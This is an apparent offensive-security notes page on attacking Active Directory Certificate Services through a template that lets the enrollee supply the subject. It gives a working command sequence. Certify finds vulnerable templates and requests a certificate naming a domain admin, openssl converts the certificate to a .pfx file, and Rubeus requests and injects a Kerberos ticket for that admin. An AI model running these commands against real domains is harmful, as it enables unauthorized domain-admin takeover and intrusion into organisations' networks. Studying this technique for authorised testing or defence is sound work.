ADCS Attacks

Find Certificate templates in the domain:

certify.exe find

Find vulnerable Certificate templates in the domain

certify.exe find /vulnerable

Vulnerable Certificate template: property msPKI-Certificate-Name-Flag is set to ENROLLEE_SUPPLIES_SUBJECT, meaning the requesting entity can set the subject of the cert.

With the vulnerable Cert template identified,

Certify.exe request /ca:domain\ca-host /template:templateName /altname:domain\domainAdmin

This will generate a .pem

[*] cert.pem         :

-----BEGIN RSA PRIVATE KEY-----
...
-----BEGIN CERTIFICATE-----

Convert the pem to a pkcs#12 (.pfx) with openssl

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Ask for TGT with Rubeus:

Rubeus.exe asktgt /user:domainAdmin /certificate:cert.pfx /nowrap

And pass the ticket into your session

# Purge existing tickets if necessary
klist purge 
Rubeus.exe ptt /ticket:<ticket_b64>

# Ticket should now exist in your session
klist

PreviousDot NET Reflection NextResource Based Constrained Delegation

Last updated 3 months ago